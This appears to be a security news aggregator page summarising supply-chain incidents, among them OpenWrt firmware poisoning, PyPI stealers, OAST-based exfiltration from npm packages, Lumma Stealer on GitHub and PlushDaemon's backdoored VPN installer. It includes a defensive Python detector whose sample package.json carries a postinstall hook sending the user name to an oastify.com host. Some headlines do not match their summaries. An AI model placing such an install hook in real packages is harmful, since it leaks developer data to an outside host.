- Osint10x: Russian-Speaking Attackers Target Ethereum Devs with Fake Hardhat npm Packages
do son@securityonline.info - 72d
A critical vulnerability (CVE-2024-54143) in OpenWrt’s Attended SysUpgrade (ASU) server allowed attackers to inject malicious firmware images during updates. The attack chained a truncated SHA-256 hash collision with a command injection flaw, putting many routers at risk. OpenWrt developers quickly addressed the vulnerability in updated releases. This attack highlights how critical it is to secure the firmware update process, and the risk of supply chain attacks affecting embedded devices.
References:
- Cyber Security News: Information about the OpenWrt supply chain attack that uses a SHA-256 collision and command injection.
- malware.news: Details about a critical OpenWrt vulnerability enabling malicious firmware installation.
- securityonline.info: Report on the vulnerability in OpenWrt's Attended SysUpgrade (ASU) server that allows for firmware poisoning.
- socradar.io: Details about the critical vulnerability (CVE-2024-54143) in OpenWrt’s Attended SysUpgrade (ASU) server, allowing attackers to compromise firmware integrity.
- www.bleepingcomputer.com: Security researcher RyotaK discovered a vulnerability in OpenWrt's sysupgrade mechanism that allows for command injection.
- www.scworld.com: Critical OpenWrt bug enabling malicious firmware image installation addressed
MalBot@malware.news - 51d
Researchers at Eclypsium have uncovered critical security flaws in the Illumina iSeq 100 DNA gene sequencer. The device uses an outdated BIOS firmware implementation that boots through the Compatibility Support Module (CSM) without Secure Boot or standard firmware write protections. This allows an attacker with system access to overwrite the firmware, which could disable the device entirely or install persistent malware.
The identified security gaps underscore the substantial risks associated with reusing commodity hardware and neglecting regular firmware updates. The lack of modern security measures in the iSeq 100 presents a major supply chain vulnerability. This also highlights the need for stringent security protocols and configuration management to protect devices that handle sensitive genomic data, as outlined by NIST guidelines published in 2023.
References:
- malware.news: Genetic Engineering Meets Reverse Engineering: DNA Sequencer's Vulnerable BIOS
- eclypsium.com: Genetic Engineering Meets Reverse Engineering: DNA Sequencer's Vulnerable BIOS
- Eclypsium: Eclypsium identified BIOS/UEFI vulnerabilities in a popular DNA gene sequencer by healthcare technology vendor Illumina.
- The Hacker News: Researchers Uncover Major Security Flaw in Illumina iSeq 100 DNA Sequencers
- BleepingComputer: BIOS/UEFI vulnerabilities in the iSeq 100 DNA sequencer from U.S. biotechnology company Illumina could let attackers disable devices used for detecting illnesses and developing vaccines.
- gbhackers.com: Critical BIOS/UEFI Vulnerabilities Allow Attackers To Overwrite System Firmware
- securityonline.info: DNA Sequencer BIOS Vulnerabilities Pose Significant Supply Chain Risks
- ciso2ciso.com: Insecure Medical Devices — Illumina DNA Sequencer Illuminates Risks
MalBot@malware.news - 65d
Researchers have identified two malicious packages, zebo and cometlogger, on the Python Package Index (PyPI) repository. These packages are designed to steal sensitive information such as login credentials and social media accounts from compromised systems. The malicious code was actively downloaded by users. The incident highlights the increasing need for vigilance when using open-source software and the potential for supply chain attacks.
Recommended read:
References :
- The Hacker News: The Hacker News reports on researchers uncovering PyPI packages stealing keystrokes and hijacking social accounts.
- Techzine Global: Two malicious Python packages revealed by FortiGuard Labs
- ciso2ciso.com: Python Malware in Zebo-0.1.0 and Cometlogger-0.1 Found Stealing User Data – Source:hackread.com
- osint10x.com: Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts
- securityonline.info: PyPI Poisoned: “Zebo” and “Cometlogger” Downloaded Hundreds of Times
@securityonline.info - 51d
Hackers are increasingly weaponizing legitimate security testing tools, specifically Out-of-Band Application Security Testing (OAST) techniques, within the npm, PyPI, and RubyGems ecosystems. Malicious packages are being used to exfiltrate sensitive data and establish command and control channels, allowing for multi-stage attacks using what appears to be legitimate infrastructure. These packages often impersonate genuine libraries to steal developer secrets. For example, one campaign targeted Ethereum developers by mimicking Hardhat plugins to obtain private keys and configuration details. In some cases, threat actors combine methods, from inflated version numbers to typosquatting of package names, to deceive developers into downloading the malicious payloads.
These malicious packages are collecting a range of information, including user system information like hostname, username, working directories, and private keys. This data is often encrypted and transmitted to attacker-controlled endpoints using hardcoded keys and Ethereum addresses. Notably, OAST services such as oastify.com and oast.fun are being abused to exfiltrate this stolen information. This method is particularly dangerous as it allows attackers to perform stealthy reconnaissance and data theft while bypassing basic intrusion detection systems. The exploitation of these ecosystems underscores the need for developers to be vigilant and implement stricter auditing practices.
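As an added defender-side example (not code from any of the cited reports), the following Python flags DNS lookups and npm install hooks that reference the two OAST apex domains named above; the log lines, package name and manifest are constructed:

```python
# Added example, not code from any of the cited reports: flag DNS lookups and
# npm install hooks that reference the OAST apex domains named in the summary.
import json
import re
from typing import Iterable

OAST_APEXES = ("oastify.com", "oast.fun")  # each probe uses a unique subdomain

# A hostname that is one of the apexes or any subdomain of one (word-bounded,
# so "oast.funky.example" or "notoastify.com" does not match).
_OAST_RE = re.compile(
    r"\b((?:[a-z0-9-]+\.)*(?:" + "|".join(map(re.escape, OAST_APEXES)) + r"))\b",
    re.IGNORECASE,
)


def find_oast_hosts(lines: Iterable[str]) -> list[tuple[int, str]]:
    """Return (line_number, hostname) for every OAST hostname in the log lines."""
    return [(n, m.group(1).lower())
            for n, line in enumerate(lines, start=1)
            for m in _OAST_RE.finditer(line)]


def risky_npm_scripts(package_json: str) -> dict[str, str]:
    """Return npm lifecycle hooks (run automatically on install) that contact OAST."""
    hooks = ("preinstall", "install", "postinstall", "prepare")
    scripts = json.loads(package_json).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in hooks and _OAST_RE.search(v)}


# Constructed sample data, not real captures.
SAMPLE_DNS_LOG = [
    "2025-01-10T10:00:01Z build-01 query A registry.npmjs.org",
    "2025-01-10T10:00:02Z build-01 query A c2kq8d3ahsv0m.oastify.com",
    "2025-01-10T10:00:03Z build-01 query TXT hostname.user.oast.fun",
    "2025-01-10T10:00:04Z build-01 query A pypi.org",
]
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "hardhat-plugin-lookalike",  # hypothetical typosquat name
    "scripts": {
        "postinstall": "node -e \"require('https').get('https://x.oastify.com/'+process.env.USER)\"",
        "test": "mocha",
    },
})

if __name__ == "__main__":
    for n, host in find_oast_hosts(SAMPLE_DNS_LOG):
        print(f"DNS line {n}: OAST callback host {host}")
    for hook, cmd in risky_npm_scripts(SAMPLE_PACKAGE_JSON).items():
        print(f"npm {hook} hook contacts an OAST service: {cmd}")
```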
Recommended read:
References :
- Cyber Security News: Hackers Weaponize npm, PyPI, & Ruby for Devastating Exploit Packages
- gbhackers.com: Hackers Weaponize Security Testing By Weaponizing npm, PyPI, & Ruby Exploit Packages
- securityonline.info: Malicious Packages Weaponize OAST for Stealthy Data Exfiltration and Reconnaissance
CISO2CISO Editor 2@ciso2ciso.com - 26d
A new, sophisticated cyber campaign is utilizing GitHub's infrastructure to distribute the Lumma Stealer malware, a notorious data-stealing tool. The campaign is not limited to Lumma Stealer; it also distributes other malicious software including SectopRAT, Vidar, and Cobeacon. Attackers are exploiting the platform's release mechanisms to gain initial access to systems and subsequently deploy these harmful payloads. This tactic has allowed the threat actors to leverage a trusted platform, tricking users into downloading files from malicious URLs, thereby increasing the risk of widespread infections.
Trend Micro researchers have analyzed the tactics, techniques and procedures (TTPs) used in this campaign and found significant similarities with those used by the Stargazer Goblin group, indicating a potential connection between the two. The Lumma Stealer malware is known for extracting credentials, cryptocurrency wallets, system details, and other sensitive files. SOC Prime Platform has released detection content aimed at helping security teams proactively identify and thwart related threats. This includes Sigma rules for Lumma Stealer, SectopRAT, Vidar, and Cobeacon detection, highlighting the ongoing efforts to counter this dangerous threat.
Recommended read:
References :
- ciso2ciso.com: Lumma Stealer, nefarious info-stealing malware, resurfaces in the cyber threat arena. Defenders recently uncovered an advanced adversary campaign distributing Lumma Stealer through GitHub infrastructure along with other malware variants, including SectopRAT, Vidar, and Cobeacon.
- SOC Prime Blog: Lumma Stealer, nefarious info-stealing malware, resurfaces in the cyber threat arena. Defenders recently uncovered an advanced adversary campaign distributing Lumma Stealer through GitHub infrastructure along with other malware variants, including SectopRAT, Vidar, and Cobeacon.
- Virus Bulletin: Trend Micro researchers dissect the tactics, techniques and procedures (TTPs) employed by a campaign distributing Lumma Stealer through GitHub.
- ciso2ciso.com: Lumma Stealer Detection: Sophisticated Campaign Using GitHub Infrastructure to Spread SectopRAT, Vidar, Cobeacon, and Other Types of Malware – Source: socprime.com
- www.trendmicro.com: Trend Micro reports on a campaign distributing Lumma stealer through GitHub.
- gbhackers.com: Cybercriminals Exploit GitHub Infrastructure to Distribute Lumma Stealer
CISO2CISO Editor 2@ciso2ciso.com - 36d
A new China-aligned cyber espionage group named PlushDaemon has been discovered conducting a supply chain attack against a South Korean VPN provider, IPany. The group compromised the VPN provider's software installer, replacing it with a malicious version that deploys the custom SlowStepper malware. This malware is a sophisticated backdoor with a large toolkit composed of around 30 modules, programmed in C++, Python, and Go, designed for espionage activities. The group typically gains initial access by hijacking legitimate software updates of Chinese applications, so this supply chain attack marks a significant departure from its usual tactics.
ESET Research identified the attack after detecting malicious code in a Windows NSIS installer downloaded from the IPany website in May 2024. The compromised installer included both the legitimate VPN software and the SlowStepper backdoor. ESET researchers notified IPany, and the malicious installer has since been removed. PlushDaemon, active since at least 2019, is believed to be the exclusive user of the SlowStepper malware and has targeted individuals and entities in China, Taiwan, Hong Kong, South Korea, the US, and New Zealand. The group is also known to gain access via vulnerabilities in legitimate web servers.
Recommended read:
References :
- ciso2ciso.com: PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack.
- BleepingComputer: South Korean VPN provider IPany was breached in a supply chain attack by the "PlushDaemon" China-aligned hacking group
- ESET Research: A previously unknown China-aligned APT dubbed PlushDaemon conducts cyberespionage and is responsible for a supply-chain attack against a VPN provider in South Korea.
- ciso2ciso.com: Details about the Chinese threat group PlushDaemon.
- www.welivesecurity.com: A previously unknown China-aligned APT dubbed PlushDaemon conducts cyberespionage and is responsible for a supply-chain attack against a VPN provider in South Korea.
- ciso2ciso.com: Chinese cyberspies target South Korean VPN in supply chain attack aimed at deploying a custom backdoor to collect data for cyber-espionage purposes.
- www.bleepingcomputer.com: South Korean VPN provider IPany was breached in a supply chain attack by the "PlushDaemon" China-aligned hacking group, who compromised the company's VPN installer to deploy the custom 'SlowStepper' malware.
- discuss.privacyguides.net: The attackers replaced the legitimate installer with one that also deployed the group’s signature backdoor.
- therecord.media: Chinese hackers target Korean VPN provider by placing backdoored installer on website
- ciso2ciso.com: ESET researchers discovered a previously undocumented China-aligned advanced persistent threat (APT) group named PlushDaemon, which has been linked to a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023.
- go.theregister.com: Supply chain attack hits Chrome extensions, could expose millions